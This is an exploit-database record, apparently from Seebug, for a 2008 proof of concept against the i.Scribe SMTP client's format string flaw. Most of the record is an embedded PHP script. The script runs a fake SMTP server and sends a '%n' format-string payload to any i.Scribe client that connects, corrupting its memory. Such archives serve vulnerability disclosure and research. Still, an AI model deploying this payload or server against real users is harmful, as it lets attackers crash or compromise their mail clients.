Description
No description provided by source.
{"href": "https://www.seebug.org/vuldb/ssvid-10124", "status": "poc", "bulletinFamily": "exploit", "modified": "2008-11-28T00:00:00", "title": "i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC", "cvss": {"vector": "NONE", "score": 0.0}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-10124", "cvelist": [], "description": "No description provided by source.", "viewCount": 7, "published": "2008-11-28T00:00:00", "sourceData": "\n <?php \r\n//I dont have c lol\r\n/*___=++++++++++++__=--=________*****\r\n 0-- \r\n -- i.Scribe smtp client v 1.88 to 2.00 beta\r\n Format String (wscanf) bug p0c\r\n vendor : Memecode Software \r\n grTs;SiD.psycho \r\n A.Luja 27.11.08 \r\n\r\n--)(________++++++++++++++++++++---*** \r\n\r\n___00)_- NOTE!!! you must enabled extension=php_sockets.dll in php.ini ___==\r\n Or just open nc -l -p 25 lol*/\r\n$host= $_SERVER[SERVER_ADDR];\r\n$port= 25;\r\n$ret = "AAAA%n%n%n%n%n%n%n%n%n";\r\n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die ("socket error\\n"); \r\n$bind = socket_bind ($socket, $host, $port) or die ("bind error\\n"); \r\n$listen = socket_listen($socket,1) or die("listen error\\n");\r\nprintf("--==Fake smtp server ready==----\\n");\r\nprintf("Now connect here witch iScribe client\\n");\r\nif(($acp=socket_accept($socket))!==false){\r\n printf("Target connected\\n");\r\n sleep(2);\r\n printf("send evil char\\n");\r\n $hello=socket_write($acp,$ret,strlen($ret)); \r\n printf("done\\n");\r\n socket_close($acp);\r\n}\r\nsocket_close($socket);\r\nexit();\r\n?>\r\n\r\n//Alfons Luja\n ", "id": "SSV:10124", "enchantments_done": [], "type": "seebug", "lastseen": "2017-11-19T21:20:39", "reporter": "Root", "enchantments": {"score": {"value": 0.1, "vector": "NONE"}, "dependencies": {}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "references": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1645406894, "score": 1659785532, "epss": 1678851499}}
{}
i.Scribe SMTP Client <= 2.00b (wscanf) Remote Format String PoC